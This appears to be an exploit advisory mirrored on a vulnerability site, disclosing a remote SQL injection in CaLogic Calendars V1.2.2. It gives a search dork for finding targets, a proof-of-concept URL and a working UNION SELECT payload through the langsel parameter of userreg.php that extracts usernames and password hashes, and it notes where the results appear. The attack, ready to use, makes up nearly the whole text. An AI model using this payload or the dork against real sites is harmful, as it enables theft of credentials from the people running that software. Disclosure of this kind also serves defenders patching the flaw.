/---------------------------------------------------------------\ \ / / CaLogic Calendars V1.2.2 Remote SQL injection \ \ / \---------------------------------------------------------------/ [*] Author : His0k4 [ALGERIAN HaCkEr] [*] Dork : "CaLogic Calendars V1.2.2" [*] POC : http://localhost/[SCRIPT_PATH]/userreg.php?langsel={SQL} [*] Example : http://localhost/[SCRIPT_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)-- [*] Note : You can see the results (user name & password) in "SQL String" line for example {SQL String: select * from clc_lang_admin:21232f297a57a5a743894a0e4a801fc3 where keyid='urth'} ---------------------------------------------------------------------------- [*] Greetings : Str0ke, all friends & muslims HaCkeRs...
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论